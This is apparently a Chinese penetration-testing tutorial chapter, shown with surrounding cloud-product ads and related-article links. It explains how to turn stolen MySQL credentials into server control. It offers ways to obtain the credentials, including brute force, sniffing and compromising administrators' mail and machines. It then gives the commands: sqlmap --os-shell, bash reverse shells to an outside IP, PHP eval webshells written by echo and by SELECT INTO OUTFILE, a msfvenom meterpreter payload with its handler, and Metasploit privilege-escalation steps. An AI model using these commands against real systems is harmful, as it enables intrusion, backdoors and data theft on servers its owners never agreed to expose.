4.3 使用sqlmap直连MySQL获取webshell

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: 4.3 使用sqlmap直连MySQL获取webshell

4.3 使用sqlmap直连MySQL获取webshell

在一些场景下,需要通过MySQL直接连接来获取权限,如果通过暴力破解,嗅探等方法获取了账户和密码,而服务器没开放Web服务的情况,那么就得直接通过数据库获取一定的权限了

4.3.1 使用场景

(1) 获取了MySQL数据库账户和密码

(2) 可以访问3306端口及数据库

4.3.2 扫描获取root账户的密码

通常有下面一些方法来获取root账户的密码

(1) phpMyAdmin 多线程批量破解工具,可以通过收集phpMyAdmin地址进行暴力破解

(2) 代码泄露获取数据库账户和密码

(3) 文件包含读取配置文件中的数据库账户和密码

(4) 通过网络嗅探获取

(5) 渗透运维人员的邮箱及个人主机获取

4.3.3 获取shell

  1. 通过sqlmap连接MySQL获取shell

(1) 直接连接数据库

sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell

(2) 通过选择32位或者64位操作系统webshell,执行

bash -i >& /dev/tcp/10.12.22.33/8899 0>&1

(3) 反弹到服务器10.12.22.33 实际的环境中就是自己的独立公网IP地址

(4) 通过echo命令生成shell

echo "<?php @eval($_POST['bmfx']);?>" > /var/www/html/data/phpmyadmin/bmfx.php

如果可以通过phpmyadmin管理数据库,就可以修改host为"%" 并执行权限更新操作,具体如下:

use mysql;

update user set host = '%' where user = 'root';

flush privileges;

注意:如果数据库中有都个host连接,修改时可能会导致数据库连接出问题

  1. 通过MSF反弹获取shell

(1) 使用msfvenom生成MSF反弹的PHP脚本木马,默认端口4444

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.12.22.33 -f raw > bmfx.php

(2) 在独立IP或者反弹服务器上运行MSF依次执行一下命令

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 10.12.22.33 //这个IP地址就是自己的独立服务器IP地址,

show options

run 0 或者 exploit

(3) 上传并执行PHP文件

将上面生成的bmfx.php文件上传至目标站点,然后访问,如果没有问题的话,那么MSF会显示成功反弹shell

  1. 通过PHPMyAdmin管理解码查询生成webshell

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE 'F:/phpstudy/www/bmfx.php'

4.3.4 实例演示

  1. 直接连接MySQL数据库

sqlmap.py -d "mysql:/root:123456@xxx.xx.xx.xx:3306/mysql" --os-shell

如果上述成功了, 会让你选中服务器架构是32位还是64位

  1. 上传UDF文件

在上述操作选择系统架构之后,sqlmap会自动上传UDF文件到服务器提权位置,记住,不管获取的shell是否成功都会显示os-shell提示符

  1. 执行命令

cat /etc/passwd

如果是真的成功获取了shell,那么执行的结果就是我们想要的信息

  1. 获取反弹shell

虽然通过sqlmap获取了shell,但实际操作的话着实不方便,需要使用独立的服务器进行反弹shell

nc -lvnp 9988

在sqlmap的shell执行

bash -i >& /dev/tcp/10.12.22.33:9988 0>&1

  1. 在服务器上生成webshell

上述操作如果没有任何问题,那么就可以找到真实路径直接生成webshell,可以在获取的反弹shell中执行locate *.php找到网站的真实路径,然后在该路径下通过echo命令生成webshell,具体如下:

echo "<?php @eval($_POST['bmfx]);?>" > bmfx.php

  1. 获取webshell

上面在服务器上生成的webshell是一句话,可以通过中国菜刀连接此一句话,进行获取webshell

  1. 通过phpMyAdmin生成一句话后门

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE '/var/www/phpmyadmin/bmfx.php'

  1. 通过MSF反弹获取shell
  1. MSF提权参考

通过MSF反弹shell,执行background将Session放在后台运行,然后搜索可以利用的exploit来进行测试,具体命令如下:

background

search "关键字" //这里是跟漏洞相关的关键字,比如search tomcat 等等

use exploit/linux

show options

set session 1

exploit

sessions -i 1

getuid

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
Web App开发 关系型数据库 PHP
|
27天前
|
存储 SQL 关系型数据库
Mysql学习笔记(二):数据库命令行代码总结
这篇文章是关于MySQL数据库命令行操作的总结,包括登录、退出、查看时间与版本、数据库和数据表的基本操作(如创建、删除、查看)、数据的增删改查等。它还涉及了如何通过SQL语句进行条件查询、模糊查询、范围查询和限制查询,以及如何进行表结构的修改。这些内容对于初学者来说非常实用,是学习MySQL数据库管理的基础。
104 6
|
24天前
|
存储 关系型数据库 MySQL
Mysql(4)—数据库索引
数据库索引是用于提高数据检索效率的数据结构,类似于书籍中的索引。它允许用户快速找到数据,而无需扫描整个表。MySQL中的索引可以显著提升查询速度,使数据库操作更加高效。索引的发展经历了从无索引、简单索引到B-树、哈希索引、位图索引、全文索引等多个阶段。
57 3
Mysql(4)—数据库索引
|
27天前
|
SQL Ubuntu 关系型数据库
Mysql学习笔记(一):数据库详细介绍以及Navicat简单使用
本文为MySQL学习笔记,介绍了数据库的基本概念,包括行、列、主键等,并解释了C/S和B/S架构以及SQL语言的分类。接着,指导如何在Windows和Ubuntu系统上安装MySQL,并提供了启动、停止和重启服务的命令。文章还涵盖了Navicat的使用,包括安装、登录和新建表格等步骤。最后,介绍了MySQL中的数据类型和字段约束,如主键、外键、非空和唯一等。
62 3
Mysql学习笔记(一):数据库详细介绍以及Navicat简单使用
|
1月前
|
缓存 算法 关系型数据库
Mysql(3)—数据库相关概念及工作原理
数据库是一个以某种有组织的方式存储的数据集合。它通常包括一个或多个不同的主题领域或用途的数据表。
46 5
Mysql(3)—数据库相关概念及工作原理
|
10天前
|
关系型数据库 MySQL Linux
在 CentOS 7 中通过编译源码方式安装 MySQL 数据库的详细步骤,包括准备工作、下载源码、编译安装、配置 MySQL 服务、登录设置等。
本文介绍了在 CentOS 7 中通过编译源码方式安装 MySQL 数据库的详细步骤,包括准备工作、下载源码、编译安装、配置 MySQL 服务、登录设置等。同时,文章还对比了编译源码安装与使用 RPM 包安装的优缺点,帮助读者根据需求选择最合适的方法。通过具体案例,展示了编译源码安装的灵活性和定制性。
46 2
|
13天前
|
存储 关系型数据库 MySQL
MySQL vs. PostgreSQL:选择适合你的开源数据库
在众多开源数据库中,MySQL和PostgreSQL无疑是最受欢迎的两个。它们都有着强大的功能、广泛的社区支持和丰富的生态系统。然而,它们在设计理念、性能特点、功能特性等方面存在着显著的差异。本文将从这三个方面对MySQL和PostgreSQL进行比较,以帮助您选择更适合您需求的开源数据库。
54 4
|
18天前
|
存储 关系型数据库 MySQL
如何在MySQL中创建数据库?
【10月更文挑战第16天】如何在MySQL中创建数据库?
|
22天前
|
SQL Oracle 关系型数据库
安装最新 MySQL 8.0 数据库(教学用)
安装最新 MySQL 8.0 数据库(教学用)
95 4
|
21天前
|
存储 SQL 关系型数据库
【入门级教程】MySQL:从零开始的数据库之旅
本教程面向零基础用户,采用通俗易懂的语言和丰富的示例,帮助你快速掌握MySQL的基础知识和操作技巧。内容涵盖SQL语言基础(SELECT、INSERT、UPDATE、DELETE等常用语句)、使用索引提高查询效率、存储过程等。适合学生、开发者及数据库爱好者。
35 0
【入门级教程】MySQL:从零开始的数据库之旅